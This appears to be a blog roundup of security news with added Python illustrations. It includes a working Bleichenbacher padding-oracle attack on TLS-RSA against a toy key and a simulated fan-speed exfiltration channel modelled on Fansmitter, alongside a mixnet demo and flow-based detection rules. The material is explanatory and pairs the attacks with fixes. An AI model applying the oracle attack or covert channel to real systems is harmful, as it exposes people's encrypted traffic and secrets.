Facebook Messenger Finally Adds End-to-End Encryption

It seems that Facebook is finally coming to its senses and catching up with basically all of the other chat apps by adding end-to-end encryption to its Messenger app. The “secret conversations” feature makes a chat readable only by the sender and the recipient (finally!). This means that nobody other than the sender and the recipient, including Facebook itself, law enforcement and criminals, can read these selected chats.

There’s also another side to ‘secret conversations’: they let users set an expiration time for messages. I should mention that none of this is turned on by default; you have to start a secret conversation explicitly each time you want one. Also, the feature is only available to a select few while it’s still in testing, but it should be rolled out to the rest of Facebook very soon.

According to their blog post, a ‘secret conversation’ can only be read on one device, and rich content such as videos, GIFs and payments is not currently supported. Under the hood the feature is built on the Signal Protocol, the same protocol used by Signal and WhatsApp.

New Anonymity Network Created

Anonymity networks matter because they protect people living under repressive regimes from surveillance of their Internet use. Tor, the most popular free anonymity network, has repeatedly been found to have weaknesses (in particular against traffic analysis by an adversary who can watch enough of its relays), so researchers and computer scientists have been trying to design more secure anonymity networks. A team at MIT has now succeeded: a new, more secure and more efficient anonymity network has just been created.

The new anonymity network provides strong anonymity guarantees and uses bandwidth more efficiently than its predecessors. In experiments it needed only one-tenth of the time existing systems take to transfer a large file between anonymous users.

The network uses several existing cryptographic techniques but combines them in a new way. At the “heart” of the system is a series of servers known as a mixnet. Each server permutes the order of the keys or messages it receives before passing them on to the next, so an adversary who tracked where each message entered has no idea which is which by the time they leave the last server. Because every server shuffles in turn, a single honest server is enough to keep the overall permutation secret. This reshuffling of the messages is what gives the new system its name: Riffle.
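As an added illustration (this is not code from the Riffle project or the MIT paper), here is a toy mixnet in Python: each client wraps its message in one encryption layer per server, and each server strips its layer and shuffles the batch with a fresh random permutation before forwarding it. The layer cipher is a stand-in, an HMAC-SHA-256 keystream XOR with symmetric keys assumed to be shared out of band, where Riffle uses public-key encryption and verifiable shuffles; the messages and keys are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Toy layer cipher: an HMAC-SHA-256 keystream XORed over the data. It stands in
# for the public-key encryption a real mixnet uses; keys are shared out of band.
NONCE_LEN = 16


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < length:
        block = nonce + counter.to_bytes(4, "big")
        out += hmac.new(key, block, hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wrap(data: bytes, key: bytes) -> bytes:
    """Add one onion layer: nonce || data XOR keystream(key, nonce)."""
    nonce = secrets.token_bytes(NONCE_LEN)
    return nonce + xor(data, keystream(key, nonce, len(data)))


def unwrap(blob: bytes, key: bytes) -> bytes:
    """Strip one onion layer."""
    nonce, body = blob[:NONCE_LEN], blob[NONCE_LEN:]
    return xor(body, keystream(key, nonce, len(body)))


def client_onion(message: bytes, server_keys: list[bytes]) -> bytes:
    """Wrap for the last server first, so the first server peels the outer layer."""
    blob = message
    for key in reversed(server_keys):
        blob = wrap(blob, key)
    return blob


class MixServer:
    def __init__(self, key: bytes):
        self.key = key
        self.last_permutation = None   # kept only so the behaviour can be inspected

    def mix(self, batch: list[bytes]) -> list[bytes]:
        """Strip this server's layer from every message, then output the batch in
        a fresh secret random order (Fisher-Yates driven by a CSPRNG)."""
        stripped = [unwrap(blob, self.key) for blob in batch]
        perm = list(range(len(batch)))
        for i in range(len(perm) - 1, 0, -1):
            j = secrets.randbelow(i + 1)
            perm[i], perm[j] = perm[j], perm[i]
        self.last_permutation = perm
        return [stripped[p] for p in perm]


def run_mixnet(messages: list[bytes], servers: list[MixServer]) -> list[bytes]:
    """Send one message per client through every server in turn. Messages must be
    the same length: otherwise their sizes alone would link inputs to outputs."""
    assert len({len(m) for m in messages}) == 1, "pad messages to a fixed size"
    batch = [client_onion(m, [s.key for s in servers]) for m in messages]
    for server in servers:
        batch = server.mix(batch)
    return batch


def demo() -> tuple[list[bytes], list[bytes]]:
    """Constructed sample run: four equal-length messages through three servers.
    Returns (what went in, what came out); the multiset is identical, but the
    order is linkable only by a party that knows every server's permutation."""
    servers = [MixServer(secrets.token_bytes(32)) for _ in range(3)]
    messages = [b"report from client %d" % i for i in range(4)]
    return messages, run_mixnet(messages, servers)
```

The point to notice is that an observer who sees the batch enter the first server and leave the last one sees the same number of equal-sized blobs with unrelated contents; only the composition of all three permutations links them, which is why one honest server suffices. What this toy omits, and Riffle adds, is a way for servers to prove they shuffled correctly rather than dropping or replacing messages.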

Fixing Security Gaps in Internet Encryption Protocol TLS

The Internet encryption protocol TLS (Transport Layer Security) is being revised, partly in response to researchers and IT experts who have studied attacks on it and uncovered serious security gaps in the protocol.

The researchers succeeded in stealing a key that two parties had negotiated via TLS version 1.2. Such a key is needed whenever the communicating parties want to exchange secret information, a customer sending credit card details to an online shop, for example. TLS 1.2 offers three families of key exchange (RSA key transport, Diffie-Hellman and elliptic-curve Diffie-Hellman), but most problems are caused by one of them, the RSA handshake (TLS-RSA). Here’s how that works:

The online shop’s server sends the customer a letter box (its RSA public key). The customer places a secret message (the premaster secret, from which the session keys are derived) in the box, locks it and sends it back. The server opens the box with its private key and so obtains the secret message, that is, the key.

The team performed a Bleichenbacher attack and recovered the key. The attacker, who has captured the locked letter box, sends the server many deliberately altered copies of it. The server expects the opened message to have a specific form (the PKCS#1 v1.5 padding), and if it doesn’t, its error handling is launched. Error handling takes longer than continuing the key exchange as usual, and that time difference is the clue: each answer tells the attacker whether the altered message was well-formed, and after many thousands of such queries the original secret can be pinned down exactly. The standard countermeasure, already required by the TLS 1.2 specification, is to behave identically whether the padding is valid or not, by continuing the handshake with a random secret, and to do so in constant time.
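To make the oracle concrete, here is an added Python example (not the researchers’ code) of Bleichenbacher’s attack against a toy PKCS#1 v1.5 server. The server leaks a single bit per query, whether the decrypted block starts with 00 02; for the demo that bit is returned directly instead of being inferred from timing. The RSA key is built from two Mersenne primes purely so the block needs no key-generation code, and the “premaster secret” is a constructed sample.

```python
import os

# Toy RSA key from two Mersenne primes so the example needs no key generation.
# The 196-bit modulus is trivially factorable; the attack below never factors
# anything, it only asks the padding oracle yes/no questions.
P = (1 << 89) - 1
Q = (1 << 107) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8     # modulus length in bytes (25)
B = 1 << (8 * (K - 2))            # conformant PKCS#1 v1.5 blocks lie in [2B, 3B)


def ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def pkcs1_v15_pad(msg: bytes) -> int:
    """EME-PKCS1-v1_5 block 00 02 <non-zero random bytes> 00 <msg>, as an integer."""
    assert len(msg) <= K - 11, "message too long for this modulus"
    pad = b""
    while len(pad) < K - 3 - len(msg):
        byte = os.urandom(1)
        if byte != b"\x00":
            pad += byte
    return int.from_bytes(b"\x00\x02" + pad + b"\x00" + msg, "big")


def pkcs1_v15_unpad(m: int) -> bytes:
    block = m.to_bytes(K, "big")
    assert block[:2] == b"\x00\x02", "not a conformant block"
    return block[block.index(b"\x00", 2) + 1:]


def rsa_encrypt(m: int) -> int:
    return pow(m, E, N)


class LeakyServer:
    """A TLS-RSA server whose behaviour differs when the padding is wrong. In the
    research above the difference was time spent in error handling; here it is
    returned directly as a boolean so the oracle queries can be counted."""

    def __init__(self):
        self.queries = 0

    def padding_conformant(self, c: int) -> bool:
        self.queries += 1
        return 2 * B <= pow(c, D, N) < 3 * B   # decrypted block starts with 00 02


def merge(intervals: list[tuple[int, int]]) -> list[tuple[int, int]]:
    intervals.sort()
    out = []
    for a, b in intervals:
        if out and a <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], b))
        else:
            out.append((a, b))
    return out


def bleichenbacher(oracle, c: int) -> int:
    """Recover m from c = m^E mod N using only oracle(c') -> bool
    (Bleichenbacher 1998, steps 2 to 4; blinding is skipped since c is conformant)."""
    intervals = [(2 * B, 3 * B - 1)]
    s = ceil_div(N, 3 * B)                                    # step 2a
    while not oracle(rsa_encrypt(s) * c % N):
        s += 1
    while True:
        narrowed = []                                         # step 3
        for a, b in intervals:
            for r in range(ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo = max(a, ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    narrowed.append((lo, hi))
        intervals = merge(narrowed)
        if len(intervals) == 1 and intervals[0][0] == intervals[0][1]:
            return intervals[0][0]                            # step 4: m found
        if len(intervals) > 1:                                # step 2b
            s += 1
            while not oracle(rsa_encrypt(s) * c % N):
                s += 1
            continue
        a, b = intervals[0]                                   # step 2c
        r = ceil_div(2 * (b * s - 2 * B), N)
        while True:
            candidates = range(ceil_div(2 * B + r * N, b), (3 * B - 1 + r * N) // a + 1)
            s = next((t for t in candidates if oracle(rsa_encrypt(t) * c % N)), None)
            if s is not None:
                break
            r += 1


def demo() -> tuple[bytes, int]:
    """Constructed 'premaster secret' (real TLS uses 48 bytes; this toy key fits
    14). Returns the recovered secret and the number of oracle queries used."""
    c = rsa_encrypt(pkcs1_v15_pad(b"premaster-key"))
    server = LeakyServer()
    m = bleichenbacher(server.padding_conformant, c)
    return pkcs1_v15_unpad(m), server.queries
```

Running `demo()` recovers the secret after some thousands of queries without touching the private key. The fix is not to make the oracle harder to read but to remove it: a hardened server substitutes a random premaster secret whenever the padding check fails and carries on, so every failure looks the same to the client and, with constant-time code, takes the same time.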

The good news is that TLS version 1.3 drops RSA key transport altogether and negotiates keys only with (elliptic-curve) Diffie-Hellman, which also gives forward secrecy.

Improving Internet-Attack Detections

The number of Internet attacks is growing rapidly, which puts a very heavy strain on traditional methods of intrusion detection. The classic methods are also not prepared for the growing number of connected devices, the Internet of Things. The good news is that a researcher from the University of Twente’s CTIT institute has developed a new way of monitoring Internet traffic that offers a better way to trace attacks and intrusions.

The new method is available as open source software that is not only being tested but already in use at several major organizations and companies around the world.

The classic approach is to inspect the contents of the vast amount of data coming in, analyze the network traffic packet by packet and collect log files from every computer. According to the researcher behind the new approach, the old way means analyzing huge amounts of data that will never turn out to matter. Moreover, in the network of a large organization, with thousands of computers, phones and other devices connected, it will soon be impossible to check every device.

That’s why the new detection method takes a “flow based” approach: instead of payloads it looks at flow records (which host talked to which, on which port, when, and how many packets and bytes were exchanged), the same summaries routers already export as NetFlow or IPFIX, and detects patterns in them. This can be done at a central point, such as the router handling the traffic, so even as the number of devices behind that router grows, the detection scales up quickly and easily.

The researcher reports a detection accuracy of 100%; as with any intrusion-detection figure, that applies to the attack types and datasets used in the evaluation, not to every attack one might face.
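Here is an added Python example (not the Twente software) of what “flow based” detection looks like in practice: it runs two rules over NetFlow-style records, one for SSH password guessing and one for port scanning, using nothing but the per-flow metadata a router exports. The flow records are constructed for the demo and the thresholds are illustrative assumptions, not the researcher’s.

```python
from collections import defaultdict


def sample_flows() -> list[dict]:
    """Constructed NetFlow/IPFIX-style records (not real traffic). Each record is
    one flow: start time (s), source, destination, destination port, packets."""
    flows = []
    # Twelve short SSH flows to one server in about 40 s: password guessing.
    for i in range(12):
        flows.append((1000 + 3 * i, "10.0.0.5", "10.0.0.20", 22, 12 + i % 4))
    # One host touching fifteen different ports with one or two packets each: a scan.
    ports = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445, 993, 3306, 3389]
    for i, port in enumerate(ports):
        flows.append((1100 + i, "10.0.0.7", "10.0.0.20", port, 1 + i % 2))
    # Benign traffic: a web session and a long interactive SSH session.
    flows.append((1000, "10.0.0.9", "10.0.0.30", 443, 250))
    flows.append((1010, "10.0.0.9", "10.0.0.20", 22, 900))
    keys = ("ts", "src", "dst", "dport", "pkts")
    return [dict(zip(keys, f)) for f in flows]


def max_in_window(times: list[int], window: int) -> int:
    """Largest number of events falling inside any `window`-second span."""
    times = sorted(times)
    best = left = 0
    for right, t in enumerate(times):
        while t - times[left] > window:
            left += 1
        best = max(best, right - left + 1)
    return best


def detect(flows: list[dict], window: int = 60, min_attempts: int = 10,
           max_login_pkts: int = 20, min_scan_targets: int = 10) -> list[tuple]:
    """Flow-level rules (thresholds are illustrative assumptions):
    - ssh-bruteforce: at least min_attempts short flows from one source to one
      destination on port 22 within `window` seconds. A real login session is
      long; a failed password attempt is only a handful of packets.
    - port-scan: one source reaching at least min_scan_targets distinct
      (destination, port) pairs with at most two packets each."""
    alerts = []
    login_times = defaultdict(list)
    scan_targets = defaultdict(set)
    for f in flows:
        if f["dport"] == 22 and f["pkts"] <= max_login_pkts:
            login_times[(f["src"], f["dst"])].append(f["ts"])
        if f["pkts"] <= 2:
            scan_targets[f["src"]].add((f["dst"], f["dport"]))
    for (src, dst), times in login_times.items():
        n = max_in_window(times, window)
        if n >= min_attempts:
            alerts.append(("ssh-bruteforce", src, dst, n))
    for src, targets in scan_targets.items():
        if len(targets) >= min_scan_targets:
            alerts.append(("port-scan", src, len(targets)))
    return sorted(alerts)
```

Note what the detector never needs: packet payloads or agents on the end hosts. It consumes one record per flow, so its cost grows with the number of connections seen at the collection point rather than with the number of devices, which is the scaling argument made above. The price is that anything visible only inside a payload is invisible here.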

Your PC’s Cooling Fans Can Reveal Passwords and Encryption Keys

Not to make you paranoid or anything, but here’s a security update: researchers at Ben-Gurion University have shown that the sounds made by a PC’s cooling fan can be analyzed and interpreted to extract pretty much anything, from passwords to encryption keys.

How is this possible, you ask? With fan-exploiting malware called “Fansmitter”. Your computer would first have to be infected with malware designed to leak information through the sound of its cooling fan. Once installed, the malware flips the fan speed between 1,000 RPM and 1,600 RPM, an audible difference that a microphone, such as the one in any smartphone, can easily pick up.

In the research, the computer infected with Fansmitter transmitted a long string of binary data this way, while a nearby phone listened and decoded it, successfully.

What does this mean? For one, an air-gapped computer with nothing connected to it could still have data stolen by this malware. For another, it doesn’t work without a microphone within earshot. Because of that, Fansmitter and similar malware could never target massive numbers of users, but they could still cause serious damage to individuals (think people in politics, finance, the military, etc.). The defences are the usual air-gap hygiene: keep phones and other microphone-bearing devices out of the room, and don’t treat “nothing is connected” as meaning “nothing can get out”.
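As an added example (not the researchers’ code), the Python below models the channel end to end: the transmitter encodes bits as the two fan speeds named above, the receiver gets noisy RPM estimates, recovers symbol timing, finds a preamble and turns the bits back into bytes. The sampling rate, preamble, noise level and the idea of reading RPM directly are assumptions for the simulation; a real receiver derives the fan speed from the blade-pass tone in the phone’s audio spectrum.

```python
import random

# Two fan speeds the scheme switches between (the values from the text);
# everything else here (sample rate, preamble, noise model) is an assumption.
LOW_RPM, HIGH_RPM = 1000, 1600
SAMPLES_PER_BIT = 8                   # RPM estimates the receiver takes per bit
PREAMBLE = [1, 0, 1, 0, 1, 1, 0, 0]   # sync pattern so the receiver finds the start
THRESHOLD = (LOW_RPM + HIGH_RPM) / 2


def bytes_to_bits(data: bytes) -> list[int]:
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def bits_to_bytes(bits: list[int]) -> bytes:
    usable = len(bits) - len(bits) % 8          # drop a trailing partial byte
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, usable, 8))


def modulate(payload: bytes) -> list[int]:
    """Transmitter (the malware): hold the fan at LOW_RPM for a 0 and HIGH_RPM for
    a 1, one symbol period each, after the preamble."""
    trace = []
    for bit in PREAMBLE + bytes_to_bits(payload):
        trace += [HIGH_RPM if bit else LOW_RPM] * SAMPLES_PER_BIT
    return trace


def microphone_capture(trace: list[int], rng: random.Random,
                       noise_rpm: float = 100.0) -> list[float]:
    """Simulated receiver: a phone estimating the fan's RPM from its blade-pass
    tone, with Gaussian error. A real receiver derives this from an audio FFT."""
    return [rpm + rng.gauss(0, noise_rpm) for rpm in trace]


def symbol_means(samples: list[float], offset: int) -> list[float]:
    aligned = samples[offset:]
    n = len(aligned) // SAMPLES_PER_BIT
    return [sum(aligned[i * SAMPLES_PER_BIT:(i + 1) * SAMPLES_PER_BIT]) / SAMPLES_PER_BIT
            for i in range(n)]


def eye_opening(samples: list[float], offset: int) -> float:
    """Average distance of the symbol means from the threshold for one alignment;
    it is largest when no symbol period straddles two bits."""
    means = symbol_means(samples, offset)
    return sum(abs(m - THRESHOLD) for m in means) / max(1, len(means))


def demodulate(samples: list[float]) -> bytes:
    """Receiver: recover symbol timing, slice at the midpoint between the two
    speeds, locate the preamble and turn the bits after it back into bytes."""
    offset = max(range(SAMPLES_PER_BIT), key=lambda o: eye_opening(samples, o))
    bits = [1 if m > THRESHOLD else 0 for m in symbol_means(samples, offset)]
    for start in range(len(bits) - len(PREAMBLE) + 1):
        if bits[start:start + len(PREAMBLE)] == PREAMBLE:
            return bits_to_bytes(bits[start + len(PREAMBLE):])
    return b""


def exfiltrate(payload: bytes, seed: int = 1) -> bytes:
    """End to end: the fan transmits, a noisy phone listens, the bytes come back.
    A few samples of idle fan noise precede the transmission so the receiver has
    to find the symbol boundaries itself."""
    rng = random.Random(seed)
    idle = [LOW_RPM] * 5
    return demodulate(microphone_capture(idle + modulate(payload), rng))
```

Two things the toy makes visible: the channel is slow (one bit per symbol period, and fans take time to change speed, so real throughput is on the order of bits per second at best), and it is fragile to timing, which is why the receiver has to recover the symbol clock before it can read a single bit. Both are reasons the attack suits a small, high-value target such as a key or a password rather than bulk data.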

Internet of Things: Security

The Internet of Things (IoT) is our future. It’s basically a network of many physical devices, such as gadgets, home appliances, vehicles and buildings, connected to the Internet. It’s expected that by the year 2020 about 20.8 billion devices will be connected to the IoT. While it’s true that the IoT will make our lives easier, it’s also true that many everyday devices will become targets of hackers and attackers unless we find a way to close the security gaps in internet-connected households.

This is why many Internet experts are working on improving the security of the IoT. Some of them are in Germany, developing new methods for discovering and fixing vulnerabilities in the software of devices that are built with different types of processors and different types of firmware.

For example, an Intel processor in a traditional computer understands more than 500 instructions, while the microcontroller in an electronic key can process about 20. The same instruction is also represented by different sequences of ones and zeros in the binary languages of the two processor types. This makes automated analysis across many different devices very difficult and potentially useless.

To solve this, the German experts translate the different binary languages into one intermediate language. They have succeeded in implementing this approach for three processor types: Intel x86, MIPS and ARM. They then look for security-critical programming errors at the intermediate-language level and try to close the security gaps automatically.

This approach is expected to be completely processor-independent by the time the IoT project is wrapped up in the year 2020.

Virtually Unbreakable Cryptographic Algorithms

Researchers from Ruhr-Universität Bochum (RUB) in Germany have developed new cryptographic algorithms that, according to them, are virtually unbreakable.

Typically, cryptographic methods have been designed like this: somebody comes up with a new algorithm and other people try to break it; if nobody succeeds, the algorithm is considered secure. The new algorithms from RUB follow a different approach: their security is provably based on particularly hard mathematical problems, so breaking the algorithm would mean solving the underlying problem.

The researchers explain that their security rests on problems studied by some of the best mathematicians: “If somebody succeeded in breaking those algorithms, he would be able to solve a mathematical problem that the greatest minds in the world have been poring over for 100 or 200 years”. The algorithms are also efficient enough to be implemented on small microdevices, such as electric garage door openers.

The new algorithms are lattice-based authentication algorithms[1]. The team tested the various parameters that make the lattice problem harder or easier and used that as the basis for developing a cryptographic algorithm. Authentication protocols are needed whenever an object has to prove its identity.

The team is also researching lattice-based encryption methods, which are needed whenever two parties want to exchange a secret message.

[1] Lattice-based cryptography is the term for asymmetric cryptographic primitives whose security is based on the hardness of problems on lattices.

Twitter algorithm

The famous Twitter platform has a unique way of working, and most of us have no idea how it decides which stories and tweets to show us.

Twitter’s search and Discover features are built to index and rank our searches, friends and tweets, and at their base is Earlybird, Twitter’s real-time search engine. As soon as you tweet something, Earlybird processes it and makes it searchable. Any URL in the tweet is fetched by Spiderduck, Twitter’s real-time URL fetcher.

Your searches, tweets and connections are recorded as a graph, a form that makes it easy to tabulate a user’s activity. That graph is processed by Cassovary, Twitter’s graph processing library, which estimates how strong your connections are and ranks them according to your preferences. Twitter’s flexible real-time search is one of the things that make its algorithm one of the best in the world.

Cellular Message Encryption Algorithm

In cryptography, the Cellular Message Encryption Algorithm (CMEA) is a block cipher that was used to secure mobile phones in the USA. CMEA is one of four cryptographic primitives specified in a Telecommunications Industry Association (TIA) standard, and it encrypts the control channel rather than the voice data.

In 1997 a group of cryptographers published attacks on the cipher showing that it had a plethora of weaknesses which give it a trivial effective strength of a 24-bit to 32-bit cipher. The NSA was accused of pressuring the original designers into crippling CMEA; the NSA has denied any role in the design or selection of the algorithm.

CMEA is described in U.S. Patent 5,159,634. It is byte-oriented, with a variable block size of 2 to 6 bytes and a key size of 64 bits; both are much smaller than usual for a modern cipher. The algorithm consists of only three passes over the data: a non-linear left-to-right diffusion operation, an un-keyed linear mixing, and another non-linear diffusion that is in fact the inverse of the first.

The non-linear operations use a keyed lookup table called the T-box, which itself uses an un-keyed lookup table called the CaveTable. The algorithm is self-inverse: encrypting the ciphertext again with the same key yields the plaintext, so encryption and decryption are the same operation.

Google: The Algorithm that Works on its Back

You might think that after a solid decade of search-market dominance, Google could afford to relax. After all, it commands a 65 percent market share and is still the only company whose name is synonymous with the verb “search”.

However, just as Google is not ready to rest on its laurels, its competitors are not ready to accept defeat. For years, the Silicon Valley monolith has used its mysterious, seemingly omniscient algorithm to, as its mission statement puts it, “organize the world’s information.” But over the past five years, a slew of companies have challenged Google’s central premise: that a single search engine, through technological wizardry and constant refinement, can satisfy any possible query.

Facebook launched an early attack with its implication that some people would rather get information from their friends than from an anonymous formula. Twitter’s ability to parse its constant stream of updates introduced the concept of real-time search, a way of tapping into the latest chatter and conversation as it unfolds. Yelp helps people find restaurants, dry cleaners, and babysitters by crowdsourcing the ratings. None of these upstarts individually presents much of a threat, but together they hint at a wide-open, messier future of search — one that is not dominated by a single engine but rather incorporates a grab bag of services.
